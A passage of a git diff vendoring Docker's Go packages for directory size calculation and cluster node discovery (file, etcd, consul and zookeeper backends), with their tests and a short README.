114} + file.Write(d) + + var size int64 + if size, _ = Size(dir); size != 6 { + t.Fatalf("directory with 6-byte file and empty directory has size: %d", size) + } +} + +// Test directory with 1 file and 1 non-empty directory +func TestSizeFileAndNestedDirectoryNonempty(t *testing.T) { + var dir, dirNested string + var err error + if dir, err = ioutil.TempDir(os.TempDir(), "TestSizeFileAndNestedDirectoryNonempty"); err != nil { + t.Fatalf("failed to create directory: %s", err) + } + if dirNested, err = ioutil.TempDir(dir, "nested"); err != nil { + t.Fatalf("failed to create nested directory: %s", err) + } + + var file *os.File + if file, err = 
ioutil.TempFile(dir, "file"); err != nil { + t.Fatalf("failed to create file: %s", err) + } + + data := []byte{100, 111, 99, 107, 101, 114} + file.Write(data) + + var nestedFile *os.File + if nestedFile, err = ioutil.TempFile(dirNested, "file"); err != nil { + t.Fatalf("failed to create file in nested directory: %s", err) + } + + nestedData := []byte{100, 111, 99, 107, 101, 114} + nestedFile.Write(nestedData) + + var size int64 + if size, _ = Size(dir); size != 12 { + t.Fatalf("directory with 6-byte file and nested directory with 6-byte file has size: %d", size) + } +} + +// Test migration of directory to a subdir underneath itself +func TestMoveToSubdir(t *testing.T) { + var outerDir, subDir string + var err error + + if outerDir, err = ioutil.TempDir(os.TempDir(), "TestMoveToSubdir"); err != nil { + t.Fatalf("failed to create directory: %v", err) + } + + if subDir, err = ioutil.TempDir(outerDir, "testSub"); err != nil { + t.Fatalf("failed to create subdirectory: %v", err) + } + + // write 4 temp files in the outer dir to get moved + filesList := []string{"a", "b", "c", "d"} + for _, fName := range filesList { + if file, err := os.Create(filepath.Join(outerDir, fName)); err != nil { + t.Fatalf("couldn't create temp file %q: %v", fName, err) + } else { + file.WriteString(fName) + file.Close() + } + } + + if err = MoveToSubdir(outerDir, filepath.Base(subDir)); err != nil { + t.Fatalf("Error during migration of content to subdirectory: %v", err) + } + // validate that the files were moved to the subdirectory + infos, err := ioutil.ReadDir(subDir) + if err != nil { + t.Fatal(err) + } + if len(infos) != 4 { + t.Fatalf("Should be four files in the subdir after the migration: actual length: %d", len(infos)) + } + var results []string + for _, info := range infos { + results = append(results, info.Name()) + } + sort.Sort(sort.StringSlice(results)) + if !reflect.DeepEqual(filesList, results) { + t.Fatalf("Results after migration do not equal list of files: expected: %v, 
got: %v", filesList, results) + } +} + +// Test a non-existing directory +func TestSizeNonExistingDirectory(t *testing.T) { + if _, err := Size("/thisdirectoryshouldnotexist/TestSizeNonExistingDirectory"); err == nil { + t.Fatalf("error is expected") + } +} diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_unix.go b/vendor/github.com/docker/docker/pkg/directory/directory_unix.go new file mode 100644 index 0000000000..397251bdb8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/directory/directory_unix.go @@ -0,0 +1,48 @@ +// +build linux freebsd solaris + +package directory + +import ( + "os" + "path/filepath" + "syscall" +) + +// Size walks a directory tree and returns its total size in bytes. +func Size(dir string) (size int64, err error) { + data := make(map[uint64]struct{}) + err = filepath.Walk(dir, func(d string, fileInfo os.FileInfo, err error) error { + if err != nil { + // if dir does not exist, Size() returns the error. + // if dir/x disappeared while walking, Size() ignores dir/x. + if os.IsNotExist(err) && d != dir { + return nil + } + return err + } + + // Ignore directory sizes + if fileInfo == nil { + return nil + } + + s := fileInfo.Size() + if fileInfo.IsDir() || s == 0 { + return nil + } + + // Check inode to handle hard links correctly + inode := fileInfo.Sys().(*syscall.Stat_t).Ino + // inode is not a uint64 on all platforms. Cast it to avoid issues. + if _, exists := data[uint64(inode)]; exists { + return nil + } + // inode is not a uint64 on all platforms. Cast it to avoid issues. 
+ data[uint64(inode)] = struct{}{} + + size += s + + return nil + }) + return +} diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_windows.go b/vendor/github.com/docker/docker/pkg/directory/directory_windows.go new file mode 100644 index 0000000000..6fb0917c4c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/directory/directory_windows.go @@ -0,0 +1,37 @@ +// +build windows + +package directory + +import ( + "os" + "path/filepath" +) + +// Size walks a directory tree and returns its total size in bytes. +func Size(dir string) (size int64, err error) { + err = filepath.Walk(dir, func(d string, fileInfo os.FileInfo, err error) error { + if err != nil { + // if dir does not exist, Size() returns the error. + // if dir/x disappeared while walking, Size() ignores dir/x. + if os.IsNotExist(err) && d != dir { + return nil + } + return err + } + + // Ignore directory sizes + if fileInfo == nil { + return nil + } + + s := fileInfo.Size() + if fileInfo.IsDir() || s == 0 { + return nil + } + + size += s + + return nil + }) + return +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/README.md b/vendor/github.com/docker/docker/pkg/discovery/README.md new file mode 100644 index 0000000000..39777c2171 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/README.md @@ -0,0 +1,41 @@ +--- +page_title: Docker discovery +page_description: discovery +page_keywords: docker, clustering, discovery +--- + +# Discovery + +Docker comes with multiple Discovery backends. + +## Backends + +### Using etcd + +Point your Docker Engine instances to a common etcd instance. You can specify +the address Docker uses to advertise the node using the `--cluster-advertise` +flag. + +```bash +$ docker daemon -H= --cluster-advertise= --cluster-store etcd://,/ +``` + +### Using consul + +Point your Docker Engine instances to a common Consul instance. You can specify +the address Docker uses to advertise the node using the `--cluster-advertise` +flag. 
+ +```bash +$ docker daemon -H= --cluster-advertise= --cluster-store consul:/// +``` + +### Using zookeeper + +Point your Docker Engine instances to a common Zookeeper instance. You can specify +the address Docker uses to advertise the node using the `--cluster-advertise` +flag. + +```bash +$ docker daemon -H= --cluster-advertise= --cluster-store zk://,/ +``` diff --git a/vendor/github.com/docker/docker/pkg/discovery/backends.go b/vendor/github.com/docker/docker/pkg/discovery/backends.go new file mode 100644 index 0000000000..2eab550e29 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/backends.go @@ -0,0 +1,107 @@ +package discovery + +import ( + "fmt" + "net" + "strings" + "time" + + "github.com/Sirupsen/logrus" +) + +var ( + // Backends is a global map of discovery backends indexed by their + // associated scheme. + backends = make(map[string]Backend) +) + +// Register makes a discovery backend available by the provided scheme. +// If Register is called twice with the same scheme an error is returned. 
+func Register(scheme string, d Backend) error { + if _, exists := backends[scheme]; exists { + return fmt.Errorf("scheme already registered %s", scheme) + } + logrus.WithField("name", scheme).Debugf("Registering discovery service") + backends[scheme] = d + return nil +} + +func parse(rawurl string) (string, string) { + parts := strings.SplitN(rawurl, "://", 2) + + // nodes:port,node2:port => nodes://node1:port,node2:port + if len(parts) == 1 { + return "nodes", parts[0] + } + return parts[0], parts[1] +} + +// ParseAdvertise parses the --cluster-advertise daemon config which accepts +// : or : +func ParseAdvertise(advertise string) (string, error) { + var ( + iface *net.Interface + addrs []net.Addr + err error + ) + + addr, port, err := net.SplitHostPort(advertise) + + if err != nil { + return "", fmt.Errorf("invalid --cluster-advertise configuration: %s: %v", advertise, err) + } + + ip := net.ParseIP(addr) + // If it is a valid ip-address, use it as is + if ip != nil { + return advertise, nil + } + + // If advertise is a valid interface name, get the valid IPv4 address and use it to advertise + ifaceName := addr + iface, err = net.InterfaceByName(ifaceName) + if err != nil { + return "", fmt.Errorf("invalid cluster advertise IP address or interface name (%s) : %v", advertise, err) + } + + addrs, err = iface.Addrs() + if err != nil { + return "", fmt.Errorf("unable to get advertise IP address from interface (%s) : %v", advertise, err) + } + + if len(addrs) == 0 { + return "", fmt.Errorf("no available advertise IP address in interface (%s)", advertise) + } + + addr = "" + for _, a := range addrs { + ip, _, err := net.ParseCIDR(a.String()) + if err != nil { + return "", fmt.Errorf("error deriving advertise ip-address in interface (%s) : %v", advertise, err) + } + if ip.To4() == nil || ip.IsLoopback() { + continue + } + addr = ip.String() + break + } + if addr == "" { + return "", fmt.Errorf("could not find a valid ip-address in interface %s", advertise) + } + + addr 
= net.JoinHostPort(addr, port) + return addr, nil +} + +// New returns a new Discovery given a URL, heartbeat and ttl settings. +// Returns an error if the URL scheme is not supported. +func New(rawurl string, heartbeat time.Duration, ttl time.Duration, clusterOpts map[string]string) (Backend, error) { + scheme, uri := parse(rawurl) + if backend, exists := backends[scheme]; exists { + logrus.WithFields(logrus.Fields{"name": scheme, "uri": uri}).Debugf("Initializing discovery service") + err := backend.Initialize(uri, heartbeat, ttl, clusterOpts) + return backend, err + } + + return nil, ErrNotSupported +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/discovery.go b/vendor/github.com/docker/docker/pkg/discovery/discovery.go new file mode 100644 index 0000000000..ca7f587458 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/discovery.go @@ -0,0 +1,35 @@ +package discovery + +import ( + "errors" + "time" +) + +var ( + // ErrNotSupported is returned when a discovery service is not supported. + ErrNotSupported = errors.New("discovery service not supported") + + // ErrNotImplemented is returned when discovery feature is not implemented + // by discovery backend. + ErrNotImplemented = errors.New("not implemented in this discovery service") +) + +// Watcher provides watching over a cluster for nodes joining and leaving. +type Watcher interface { + // Watch the discovery for entry changes. + // Returns a channel that will receive changes or an error. + // Providing a non-nil stopCh can be used to stop watching. + Watch(stopCh <-chan struct{}) (<-chan Entries, <-chan error) +} + +// Backend is implemented by discovery backends which manage cluster entries. +type Backend interface { + // Watcher must be provided by every backend. + Watcher + + // Initialize the discovery with URIs, a heartbeat, a ttl and optional settings. + Initialize(string, time.Duration, time.Duration, map[string]string) error + + // Register to the discovery. 
+ Register(string) error +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go b/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go new file mode 100644 index 0000000000..6084f3ef0d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go @@ -0,0 +1,137 @@ +package discovery + +import ( + "testing" + + "github.com/go-check/check" +) + +// Hook up gocheck into the "go test" runner. +func Test(t *testing.T) { check.TestingT(t) } + +type DiscoverySuite struct{} + +var _ = check.Suite(&DiscoverySuite{}) + +func (s *DiscoverySuite) TestNewEntry(c *check.C) { + entry, err := NewEntry("127.0.0.1:2375") + c.Assert(err, check.IsNil) + c.Assert(entry.Equals(&Entry{Host: "127.0.0.1", Port: "2375"}), check.Equals, true) + c.Assert(entry.String(), check.Equals, "127.0.0.1:2375") + + entry, err = NewEntry("[2001:db8:0:f101::2]:2375") + c.Assert(err, check.IsNil) + c.Assert(entry.Equals(&Entry{Host: "2001:db8:0:f101::2", Port: "2375"}), check.Equals, true) + c.Assert(entry.String(), check.Equals, "[2001:db8:0:f101::2]:2375") + + _, err = NewEntry("127.0.0.1") + c.Assert(err, check.NotNil) +} + +func (s *DiscoverySuite) TestParse(c *check.C) { + scheme, uri := parse("127.0.0.1:2375") + c.Assert(scheme, check.Equals, "nodes") + c.Assert(uri, check.Equals, "127.0.0.1:2375") + + scheme, uri = parse("localhost:2375") + c.Assert(scheme, check.Equals, "nodes") + c.Assert(uri, check.Equals, "localhost:2375") + + scheme, uri = parse("scheme://127.0.0.1:2375") + c.Assert(scheme, check.Equals, "scheme") + c.Assert(uri, check.Equals, "127.0.0.1:2375") + + scheme, uri = parse("scheme://localhost:2375") + c.Assert(scheme, check.Equals, "scheme") + c.Assert(uri, check.Equals, "localhost:2375") + + scheme, uri = parse("") + c.Assert(scheme, check.Equals, "nodes") + c.Assert(uri, check.Equals, "") +} + +func (s *DiscoverySuite) TestCreateEntries(c *check.C) { + entries, err := CreateEntries(nil) + c.Assert(entries, 
check.DeepEquals, Entries{}) + c.Assert(err, check.IsNil) + + entries, err = CreateEntries([]string{"127.0.0.1:2375", "127.0.0.2:2375", "[2001:db8:0:f101::2]:2375", ""}) + c.Assert(err, check.IsNil) + expected := Entries{ + &Entry{Host: "127.0.0.1", Port: "2375"}, + &Entry{Host: "127.0.0.2", Port: "2375"}, + &Entry{Host: "2001:db8:0:f101::2", Port: "2375"}, + } + c.Assert(entries.Equals(expected), check.Equals, true) + + _, err = CreateEntries([]string{"127.0.0.1", "127.0.0.2"}) + c.Assert(err, check.NotNil) +} + +func (s *DiscoverySuite) TestContainsEntry(c *check.C) { + entries, err := CreateEntries([]string{"127.0.0.1:2375", "127.0.0.2:2375", ""}) + c.Assert(err, check.IsNil) + c.Assert(entries.Contains(&Entry{Host: "127.0.0.1", Port: "2375"}), check.Equals, true) + c.Assert(entries.Contains(&Entry{Host: "127.0.0.3", Port: "2375"}), check.Equals, false) +} + +func (s *DiscoverySuite) TestEntriesEquality(c *check.C) { + entries := Entries{ + &Entry{Host: "127.0.0.1", Port: "2375"}, + &Entry{Host: "127.0.0.2", Port: "2375"}, + } + + // Same + c.Assert(entries.Equals(Entries{ + &Entry{Host: "127.0.0.1", Port: "2375"}, + &Entry{Host: "127.0.0.2", Port: "2375"}, + }), check. + Equals, true) + + // Different size + c.Assert(entries.Equals(Entries{ + &Entry{Host: "127.0.0.1", Port: "2375"}, + &Entry{Host: "127.0.0.2", Port: "2375"}, + &Entry{Host: "127.0.0.3", Port: "2375"}, + }), check. + Equals, false) + + // Different content + c.Assert(entries.Equals(Entries{ + &Entry{Host: "127.0.0.1", Port: "2375"}, + &Entry{Host: "127.0.0.42", Port: "2375"}, + }), check. 
+ Equals, false) + +} + +func (s *DiscoverySuite) TestEntriesDiff(c *check.C) { + entry1 := &Entry{Host: "1.1.1.1", Port: "1111"} + entry2 := &Entry{Host: "2.2.2.2", Port: "2222"} + entry3 := &Entry{Host: "3.3.3.3", Port: "3333"} + entries := Entries{entry1, entry2} + + // No diff + added, removed := entries.Diff(Entries{entry2, entry1}) + c.Assert(added, check.HasLen, 0) + c.Assert(removed, check.HasLen, 0) + + // Add + added, removed = entries.Diff(Entries{entry2, entry3, entry1}) + c.Assert(added, check.HasLen, 1) + c.Assert(added.Contains(entry3), check.Equals, true) + c.Assert(removed, check.HasLen, 0) + + // Remove + added, removed = entries.Diff(Entries{entry2}) + c.Assert(added, check.HasLen, 0) + c.Assert(removed, check.HasLen, 1) + c.Assert(removed.Contains(entry1), check.Equals, true) + + // Add and remove + added, removed = entries.Diff(Entries{entry1, entry3}) + c.Assert(added, check.HasLen, 1) + c.Assert(added.Contains(entry3), check.Equals, true) + c.Assert(removed, check.HasLen, 1) + c.Assert(removed.Contains(entry2), check.Equals, true) +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/entry.go b/vendor/github.com/docker/docker/pkg/discovery/entry.go new file mode 100644 index 0000000000..ce23bbf89b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/entry.go @@ -0,0 +1,94 @@ +package discovery + +import "net" + +// NewEntry creates a new entry. +func NewEntry(url string) (*Entry, error) { + host, port, err := net.SplitHostPort(url) + if err != nil { + return nil, err + } + return &Entry{host, port}, nil +} + +// An Entry represents a host. +type Entry struct { + Host string + Port string +} + +// Equals returns true if cmp contains the same data. +func (e *Entry) Equals(cmp *Entry) bool { + return e.Host == cmp.Host && e.Port == cmp.Port +} + +// String returns the string form of an entry. +func (e *Entry) String() string { + return net.JoinHostPort(e.Host, e.Port) +} + +// Entries is a list of *Entry with some helpers. 
+type Entries []*Entry + +// Equals returns true if cmp contains the same data. +func (e Entries) Equals(cmp Entries) bool { + // Check if the file has really changed. + if len(e) != len(cmp) { + return false + } + for i := range e { + if !e[i].Equals(cmp[i]) { + return false + } + } + return true +} + +// Contains returns true if the Entries contain a given Entry. +func (e Entries) Contains(entry *Entry) bool { + for _, curr := range e { + if curr.Equals(entry) { + return true + } + } + return false +} + +// Diff compares two entries and returns the added and removed entries. +func (e Entries) Diff(cmp Entries) (Entries, Entries) { + added := Entries{} + for _, entry := range cmp { + if !e.Contains(entry) { + added = append(added, entry) + } + } + + removed := Entries{} + for _, entry := range e { + if !cmp.Contains(entry) { + removed = append(removed, entry) + } + } + + return added, removed +} + +// CreateEntries returns an array of entries based on the given addresses. +func CreateEntries(addrs []string) (Entries, error) { + entries := Entries{} + if addrs == nil { + return entries, nil + } + + for _, addr := range addrs { + if len(addr) == 0 { + continue + } + entry, err := NewEntry(addr) + if err != nil { + return nil, err + } + entries = append(entries, entry) + } + return entries, nil +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/file/file.go b/vendor/github.com/docker/docker/pkg/discovery/file/file.go new file mode 100644 index 0000000000..2b8e27b754 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/file/file.go @@ -0,0 +1,107 @@ +package file + +import ( + "fmt" + "io/ioutil" + "strings" + "time" + + "github.com/docker/docker/pkg/discovery" +) + +// Discovery is exported +type Discovery struct { + heartbeat time.Duration + path string +} + +func init() { + Init() +} + +// Init is exported +func Init() { + discovery.Register("file", &Discovery{}) +} + +// Initialize is exported +func (s *Discovery) Initialize(path string, 
heartbeat time.Duration, ttl time.Duration, _ map[string]string) error { + s.path = path + s.heartbeat = heartbeat + return nil +} + +func parseFileContent(content []byte) []string { + var result []string + for _, line := range strings.Split(strings.TrimSpace(string(content)), "\n") { + line = strings.TrimSpace(line) + // Ignoring line starts with # + if strings.HasPrefix(line, "#") { + continue + } + // Inlined # comment also ignored. + if strings.Contains(line, "#") { + line = line[0:strings.Index(line, "#")] + // Trim additional spaces caused by above stripping. + line = strings.TrimSpace(line) + } + result = append(result, discovery.Generate(line)...) + } + return result +} + +func (s *Discovery) fetch() (discovery.Entries, error) { + fileContent, err := ioutil.ReadFile(s.path) + if err != nil { + return nil, fmt.Errorf("failed to read '%s': %v", s.path, err) + } + return discovery.CreateEntries(parseFileContent(fileContent)) +} + +// Watch is exported +func (s *Discovery) Watch(stopCh <-chan struct{}) (<-chan discovery.Entries, <-chan error) { + ch := make(chan discovery.Entries) + errCh := make(chan error) + ticker := time.NewTicker(s.heartbeat) + + go func() { + defer close(errCh) + defer close(ch) + + // Send the initial entries if available. + currentEntries, err := s.fetch() + if err != nil { + errCh <- err + } else { + ch <- currentEntries + } + + // Periodically send updates. + for { + select { + case <-ticker.C: + newEntries, err := s.fetch() + if err != nil { + errCh <- err + continue + } + + // Check if the file has really changed. 
+ if !newEntries.Equals(currentEntries) { + ch <- newEntries + } + currentEntries = newEntries + case <-stopCh: + ticker.Stop() + return + } + } + }() + + return ch, errCh +} + +// Register is exported +func (s *Discovery) Register(addr string) error { + return discovery.ErrNotImplemented +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go b/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go new file mode 100644 index 0000000000..667f00ba0d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go @@ -0,0 +1,114 @@ +package file + +import ( + "io/ioutil" + "os" + "testing" + + "github.com/docker/docker/pkg/discovery" + + "github.com/go-check/check" +) + +// Hook up gocheck into the "go test" runner. +func Test(t *testing.T) { check.TestingT(t) } + +type DiscoverySuite struct{} + +var _ = check.Suite(&DiscoverySuite{}) + +func (s *DiscoverySuite) TestInitialize(c *check.C) { + d := &Discovery{} + d.Initialize("/path/to/file", 1000, 0, nil) + c.Assert(d.path, check.Equals, "/path/to/file") +} + +func (s *DiscoverySuite) TestNew(c *check.C) { + d, err := discovery.New("file:///path/to/file", 0, 0, nil) + c.Assert(err, check.IsNil) + c.Assert(d.(*Discovery).path, check.Equals, "/path/to/file") +} + +func (s *DiscoverySuite) TestContent(c *check.C) { + data := ` +1.1.1.[1:2]:1111 +2.2.2.[2:4]:2222 +` + ips := parseFileContent([]byte(data)) + c.Assert(ips, check.HasLen, 5) + c.Assert(ips[0], check.Equals, "1.1.1.1:1111") + c.Assert(ips[1], check.Equals, "1.1.1.2:1111") + c.Assert(ips[2], check.Equals, "2.2.2.2:2222") + c.Assert(ips[3], check.Equals, "2.2.2.3:2222") + c.Assert(ips[4], check.Equals, "2.2.2.4:2222") +} + +func (s *DiscoverySuite) TestRegister(c *check.C) { + discovery := &Discovery{path: "/path/to/file"} + c.Assert(discovery.Register("0.0.0.0"), check.NotNil) +} + +func (s *DiscoverySuite) TestParsingContentsWithComments(c *check.C) { + data := ` +### test ### +1.1.1.1:1111 # inline comment 
+# 2.2.2.2:2222 + ### empty line with comment + 3.3.3.3:3333 +### test ### +` + ips := parseFileContent([]byte(data)) + c.Assert(ips, check.HasLen, 2) + c.Assert("1.1.1.1:1111", check.Equals, ips[0]) + c.Assert("3.3.3.3:3333", check.Equals, ips[1]) +} + +func (s *DiscoverySuite) TestWatch(c *check.C) { + data := ` +1.1.1.1:1111 +2.2.2.2:2222 +` + expected := discovery.Entries{ + &discovery.Entry{Host: "1.1.1.1", Port: "1111"}, + &discovery.Entry{Host: "2.2.2.2", Port: "2222"}, + } + + // Create a temporary file and remove it. + tmp, err := ioutil.TempFile(os.TempDir(), "discovery-file-test") + c.Assert(err, check.IsNil) + c.Assert(tmp.Close(), check.IsNil) + c.Assert(os.Remove(tmp.Name()), check.IsNil) + + // Set up file discovery. + d := &Discovery{} + d.Initialize(tmp.Name(), 1000, 0, nil) + stopCh := make(chan struct{}) + ch, errCh := d.Watch(stopCh) + + // Make sure it fires errors since the file doesn't exist. + c.Assert(<-errCh, check.NotNil) + // We have to drain the error channel otherwise Watch will get stuck. + go func() { + for range errCh { + } + }() + + // Write the file and make sure we get the expected value back. + c.Assert(ioutil.WriteFile(tmp.Name(), []byte(data), 0600), check.IsNil) + c.Assert(<-ch, check.DeepEquals, expected) + + // Add a new entry and look it up. + expected = append(expected, &discovery.Entry{Host: "3.3.3.3", Port: "3333"}) + f, err := os.OpenFile(tmp.Name(), os.O_APPEND|os.O_WRONLY, 0600) + c.Assert(err, check.IsNil) + c.Assert(f, check.NotNil) + _, err = f.WriteString("\n3.3.3.3:3333\n") + c.Assert(err, check.IsNil) + f.Close() + c.Assert(<-ch, check.DeepEquals, expected) + + // Stop and make sure it closes all channels. 
+ close(stopCh) + c.Assert(<-ch, check.IsNil) + c.Assert(<-errCh, check.IsNil) +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/generator.go b/vendor/github.com/docker/docker/pkg/discovery/generator.go new file mode 100644 index 0000000000..d22298298f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/generator.go @@ -0,0 +1,35 @@ +package discovery + +import ( + "fmt" + "regexp" + "strconv" +) + +// Generate takes care of IP generation +func Generate(pattern string) []string { + re, _ := regexp.Compile(`\[(.+):(.+)\]`) + submatch := re.FindStringSubmatch(pattern) + if submatch == nil { + return []string{pattern} + } + + from, err := strconv.Atoi(submatch[1]) + if err != nil { + return []string{pattern} + } + to, err := strconv.Atoi(submatch[2]) + if err != nil { + return []string{pattern} + } + + template := re.ReplaceAllString(pattern, "%d") + + var result []string + for val := from; val <= to; val++ { + entry := fmt.Sprintf(template, val) + result = append(result, entry) + } + + return result +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/generator_test.go b/vendor/github.com/docker/docker/pkg/discovery/generator_test.go new file mode 100644 index 0000000000..6281c46665 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/generator_test.go @@ -0,0 +1,53 @@ +package discovery + +import ( + "github.com/go-check/check" +) + +func (s *DiscoverySuite) TestGeneratorNotGenerate(c *check.C) { + ips := Generate("127.0.0.1") + c.Assert(len(ips), check.Equals, 1) + c.Assert(ips[0], check.Equals, "127.0.0.1") +} + +func (s *DiscoverySuite) TestGeneratorWithPortNotGenerate(c *check.C) { + ips := Generate("127.0.0.1:8080") + c.Assert(len(ips), check.Equals, 1) + c.Assert(ips[0], check.Equals, "127.0.0.1:8080") +} + +func (s *DiscoverySuite) TestGeneratorMatchFailedNotGenerate(c *check.C) { + ips := Generate("127.0.0.[1]") + c.Assert(len(ips), check.Equals, 1) + c.Assert(ips[0], check.Equals, "127.0.0.[1]") +} + +func (s 
*DiscoverySuite) TestGeneratorWithPort(c *check.C) { + ips := Generate("127.0.0.[1:11]:2375") + c.Assert(len(ips), check.Equals, 11) + c.Assert(ips[0], check.Equals, "127.0.0.1:2375") + c.Assert(ips[1], check.Equals, "127.0.0.2:2375") + c.Assert(ips[2], check.Equals, "127.0.0.3:2375") + c.Assert(ips[3], check.Equals, "127.0.0.4:2375") + c.Assert(ips[4], check.Equals, "127.0.0.5:2375") + c.Assert(ips[5], check.Equals, "127.0.0.6:2375") + c.Assert(ips[6], check.Equals, "127.0.0.7:2375") + c.Assert(ips[7], check.Equals, "127.0.0.8:2375") + c.Assert(ips[8], check.Equals, "127.0.0.9:2375") + c.Assert(ips[9], check.Equals, "127.0.0.10:2375") + c.Assert(ips[10], check.Equals, "127.0.0.11:2375") +} + +func (s *DiscoverySuite) TestGenerateWithMalformedInputAtRangeStart(c *check.C) { + malformedInput := "127.0.0.[x:11]:2375" + ips := Generate(malformedInput) + c.Assert(len(ips), check.Equals, 1) + c.Assert(ips[0], check.Equals, malformedInput) +} + +func (s *DiscoverySuite) TestGenerateWithMalformedInputAtRangeEnd(c *check.C) { + malformedInput := "127.0.0.[1:x]:2375" + ips := Generate(malformedInput) + c.Assert(len(ips), check.Equals, 1) + c.Assert(ips[0], check.Equals, malformedInput) +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go b/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go new file mode 100644 index 0000000000..77eee7d454 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go @@ -0,0 +1,192 @@ +package kv + +import ( + "fmt" + "path" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/discovery" + "github.com/docker/go-connections/tlsconfig" + "github.com/docker/libkv" + "github.com/docker/libkv/store" + "github.com/docker/libkv/store/consul" + "github.com/docker/libkv/store/etcd" + "github.com/docker/libkv/store/zookeeper" +) + +const ( + defaultDiscoveryPath = "docker/nodes" +) + +// Discovery is exported +type Discovery struct { + backend store.Backend + store store.Store + 
heartbeat time.Duration + ttl time.Duration + prefix string + path string +} + +func init() { + Init() +} + +// Init is exported +func Init() { + // Register to libkv + zookeeper.Register() + consul.Register() + etcd.Register() + + // Register to internal discovery service + discovery.Register("zk", &Discovery{backend: store.ZK}) + discovery.Register("consul", &Discovery{backend: store.CONSUL}) + discovery.Register("etcd", &Discovery{backend: store.ETCD}) +} + +// Initialize is exported +func (s *Discovery) Initialize(uris string, heartbeat time.Duration, ttl time.Duration, clusterOpts map[string]string) error { + var ( + parts = strings.SplitN(uris, "/", 2) + addrs = strings.Split(parts[0], ",") + err error + ) + + // A custom prefix to the path can be optionally used. + if len(parts) == 2 { + s.prefix = parts[1] + } + + s.heartbeat = heartbeat + s.ttl = ttl + + // Use a custom path if specified in discovery options + dpath := defaultDiscoveryPath + if clusterOpts["kv.path"] != "" { + dpath = clusterOpts["kv.path"] + } + + s.path = path.Join(s.prefix, dpath) + + var config *store.Config + if clusterOpts["kv.cacertfile"] != "" && clusterOpts["kv.certfile"] != "" && clusterOpts["kv.keyfile"] != "" { + logrus.Info("Initializing discovery with TLS") + tlsConfig, err := tlsconfig.Client(tlsconfig.Options{ + CAFile: clusterOpts["kv.cacertfile"], + CertFile: clusterOpts["kv.certfile"], + KeyFile: clusterOpts["kv.keyfile"], + }) + if err != nil { + return err + } + config = &store.Config{ + // Set ClientTLS to trigger https (bug in libkv/etcd) + ClientTLS: &store.ClientTLSConfig{ + CACertFile: clusterOpts["kv.cacertfile"], + CertFile: clusterOpts["kv.certfile"], + KeyFile: clusterOpts["kv.keyfile"], + }, + // The actual TLS config that will be used + TLS: tlsConfig, + } + } else { + logrus.Info("Initializing discovery without TLS") + } + + // Creates a new store, will ignore options given + // if not supported by the chosen store + s.store, err = libkv.NewStore(s.backend, 
addrs, config) + return err +} + +// Watch the store until either there's a store error or we receive a stop request. +// Returns false if we shouldn't attempt watching the store anymore (stop request received). +func (s *Discovery) watchOnce(stopCh <-chan struct{}, watchCh <-chan []*store.KVPair, discoveryCh chan discovery.Entries, errCh chan error) bool { + for { + select { + case pairs := <-watchCh: + if pairs == nil { + return true + } + + logrus.WithField("discovery", s.backend).Debugf("Watch triggered with %d nodes", len(pairs)) + + // Convert `KVPair` into `discovery.Entry`. + addrs := make([]string, len(pairs)) + for _, pair := range pairs { + addrs = append(addrs, string(pair.Value)) + } + + entries, err := discovery.CreateEntries(addrs) + if err != nil { + errCh <- err + } else { + discoveryCh <- entries + } + case <-stopCh: + // We were requested to stop watching. + return false + } + } +} + +// Watch is exported +func (s *Discovery) Watch(stopCh <-chan struct{}) (<-chan discovery.Entries, <-chan error) { + ch := make(chan discovery.Entries) + errCh := make(chan error) + + go func() { + defer close(ch) + defer close(errCh) + + // Forever: Create a store watch, watch until we get an error and then try again. + // Will only stop if we receive a stopCh request. + for { + // Create the path to watch if it does not exist yet + exists, err := s.store.Exists(s.path) + if err != nil { + errCh <- err + } + if !exists { + if err := s.store.Put(s.path, []byte(""), &store.WriteOptions{IsDir: true}); err != nil { + errCh <- err + } + } + + // Set up a watch. + watchCh, err := s.store.WatchTree(s.path, stopCh) + if err != nil { + errCh <- err + } else { + if !s.watchOnce(stopCh, watchCh, ch, errCh) { + return + } + } + + // If we get here it means the store watch channel was closed. This + // is unexpected so let's retry later. 
